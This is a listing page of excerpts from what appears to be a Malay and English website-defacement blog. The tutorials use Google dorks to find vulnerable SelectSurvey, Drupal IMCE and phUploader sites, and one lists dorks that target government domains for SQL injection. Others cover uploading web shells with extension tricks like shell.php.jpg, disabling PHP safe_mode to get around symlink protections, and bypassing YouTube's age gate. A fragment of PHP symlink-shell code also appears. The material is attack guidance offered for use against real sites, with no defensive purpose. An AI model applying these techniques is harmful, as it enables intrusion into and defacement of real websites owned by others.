Select Survey CMS File Upload Deface

Cara deface hack website file upload shell Assalamualaikum dan salam sejahtera.Entry hari ini aku nak ajar exploit SelectSurvey CMS. CMS ini adalah dari ASP.NET.Exploit ini membolehkan korang upload shell .asp.Ok jom mula. 1. Mula-mula cari website vuln dengan google dork : "SelectSurvey.NETv4 site:uk" "SelectSurvey.NETv4" note : main2 dengan dork untuk dapat result yang banyak. 2. Pilih salah satu website dari result. 3. Tambah di...

Read More

Drupal IMCE Mkdir Remote File Upload

Deface dengan exploit drupal deface Assalamualaikum dan salam sejahtera.Dah lama aku tak buat post exploit deface kan? Ok hari ini aku nak ajar korang satu exploit deface di bawah platform Drupal. Sebenarnya exploit ni dah lama tapi masih banyak website yang terdedah kepada exploit ni termasuk web yang baru-baru :DOK jom mula~1. Mula-mula cari web vuln dengan google dork :inurl:"/imce?dir="intitle:"File Browser" note : ubah2 dork untuk dapat...

Read More

Symlink Sa 3.0

Symlink_Sa 3.0. Shell ini dibuat oleh Sec-w.com.  Features :-> Symlink Bypass-> Bypass Read-> Mass Joomla Symlink-> Masswordpress SymlinkMass-> vBulletin SymlinkDan banyak lagi. <?phpset_time_limit(0);error_reporting(0);$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];$u = explode("/",$pageURL );$pageURL =str_replace($u[count($u)-1],"",$pageURL );$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];$u = explode("/",$pageFTP );$pageFTP =str_replace($u[count($u)-1],"",$pageFTP...

Read More

Bypass 18+ Di Dalam Youtube

Rujuk gambar di bawah Mesti korang pernah kene bende ni kan ? so macam mana nak bypass ?Ok . Jum mulakan .Ok . korang tengok Link dia macam niLink:http://www.youtube.com/watch?v=1Lu0qhRrIow .Korang ambil ID video tu sahaja 1Lu0qhRrIowKorang ambil Link NIhttp://www.youtube.com/v/Masukan ID?fs=1&ampDi tempat "Masukan ID" korang masukan ID video yang diblock tadiContoh Untuk Link Video di Atas :http://www.youtube.com/v/1Lu0qhRrIow?fs=1&ampMasukkan...

Read More

Cara Deface Hack Website File Upload Shell

Assalamualaikum dan salam sejahtera. Hari ni HMCA nak ajar exploit SelectSurvey CMS. CMS ini adalah dari ASP.NET. Exploit ini membolehkan korang upload shell .asp. Ok jom mula. 1. Mula-mula cari website vuln dengan google dork : "SelectSurvey.NETv4 site:uk" "SelectSurvey.NETv4" note : main2 dengan dork untuk dapat result yang banyak. 2. Pilih salah satu website dari result. 3. Tambah di hujung url website yang korang pilih : /survey/UploadImagePopup.aspx atau...

Read More

Tutorial Bypass Symlink Forbidden

Assalamualaikum dan salam sejahtera. hari ni HMCA nak ajar cara nakbypass symlink forbidden.mesti korang pernah dapat symlink penat2, tiba2 bila nak bukak file config tu keluar forbidden kan? Macam ni : Mesti bengang gila la hahaha..ok jangan risau jom aku ajar cara nak bypass :) 1. Mula-mula buat satu file php.ini . Copy code dibawah : safe_mode=OFFdisable_functions=NONELepas tu paste dalam notepad dan save as name : php.ini File...

Read More

phUploader Remote File Upload Vulnerability

Google Dork : intitle:Powered By phUploaderGo to Google.com and enter this DOrk, see serach resultsExploit URL :http://{site.comt}/ path/upload.php orhttp://site.com/upload.phpselect any website and upload your file therewebsite allow to upload .jpg .png .gif anf .png files onlyanyway you can upload your deface in .jpg and mirrOr website likezone-h accept it as defcaement, if want to upload a shell then upload asshell.php.jpgafter uploading...

Read More

Image Upload Vulnerabilities

Image Upload VulnerabilitiesDork: inurl:/editor/tmedit/popupsExploit Path : /editor/tmedit/popups/InsertFile/insert_file.phpThere You Can Upload Shell As Image.Then Your Shell link Will’be like http://vulnrablesite.com/images/yourfilehere Find Different Directories To Find Out Your Shell :)ASP Shell Upload How To Hack ASP Sites. First You Need To Find The Website Upload Path to Upload Shell.For That Use Google Dorks. Google Dorks:You Can Use "allinurl" Instead of "Inurl" In Google Dorks.Shell Format: Formats: shell.asp;me.jpgshell.aspshell.asp.jpgshell.asp.jpg -...

Read More

sql vuln gov

inurl:index.php?id= site:*gov.pl inurl:index.php?id= site:*gov inurl:news.php?id= site:*gov.af inurl:oferta.php?id= site:*gov.af inurl:trainers.php?id= site:*gov.pl inurl:article.php?ID= site:*gov.uk inurl:play_old.php?id= site:*gov.au inurl:declaration_more.php?decl_id= site:*gov.in inurl:Pageid= site:*gov inurl:pagina.php?left= site:*.gov.au inurl:layout.php?id=120'= site:*gov.pl inurl:principal.php?id=123'= site:*gov.uk inurl:standard.php?base_dir= site:*gov inurl:home.php?where= site:*gov.pl inurl:page.php?sivu= site:*.pl inurl:*inc*.php?adresa=...

Read More

Shell Upload Via Tamper Data

Hello Hackerz!!Sometimes You're In Trouble Of Uploading Shell In The Server With The "shell.php" Format. So Here's The Solution. Let's Have A Look. At First  Install Add-on "Tamper Data" In Mozilla Firefox. Go Here For Tamper Data. Now Change The Shell Name Into ".jpg Format" Like This, shell.php;.jpg shell.php.jpg shell.php..jpg shell.php.jpg shell.php.jpg:; shell.php.jpg%; shell.php.jpg; shell.php.jpg; shell.php.jpg:; Now...

Read More